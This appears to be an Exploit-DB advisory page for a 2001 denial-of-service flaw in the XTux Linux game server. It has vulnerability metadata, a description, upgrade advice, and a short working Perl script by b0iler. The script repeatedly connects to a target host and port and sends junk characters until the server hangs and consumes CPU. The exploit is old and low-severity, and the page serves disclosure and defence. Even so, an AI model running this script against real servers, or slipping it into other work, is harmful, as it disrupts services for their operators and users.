XTux Server Denial of Service Vulnerability

vendor:

XTux Server

by:

b0iler

2.6

CVSS

LOW

Denial of Service

400

CWE

Product Name: XTux Server

Affected Version From: 1-Jun-01

Affected Version To: 1-Jun-01

Patch Exists: YES

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Linux

2001

XTux Server Denial of Service Vulnerability

XTux is a multiplayer network game for Linux. The server component (June 01, 2001 version) is vulnerable to a denial of service initiated by connecting to the server and sending unexpected characters. This causes the server to become unresponsive and consume resources.

Mitigation:

Upgrade to the latest version of XTux server.

Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/4260/info

XTux is a multiplayer network game for Linux. The server component (June 01, 2001 version) is vulnerable to a denial of service initiated by connecting to the server and sending unexpected characters. This causes the server to become unresponsive and consume resources. 

#!/usr/bin/perl
#
# xtux server DoS - by b0iler
# server will become unresponcive and takes up lots of CPU.

use IO::Socket;

for($n=0;$n<=3;$n++){ #you shouldn't even need all 3 connections.
        print "Connecting to $ARGV[0] port $ARGV[1]\n";
        $sock = IO::Socket::INET->new(PeerAddr => $ARGV[0],  PeerPort =>
$ARGV[1], Proto    => 'tcp' ) or print "\ncouldn't connect\n\n";
        sleep 3;
        print $sock "garbage data\n\n";
}
exit;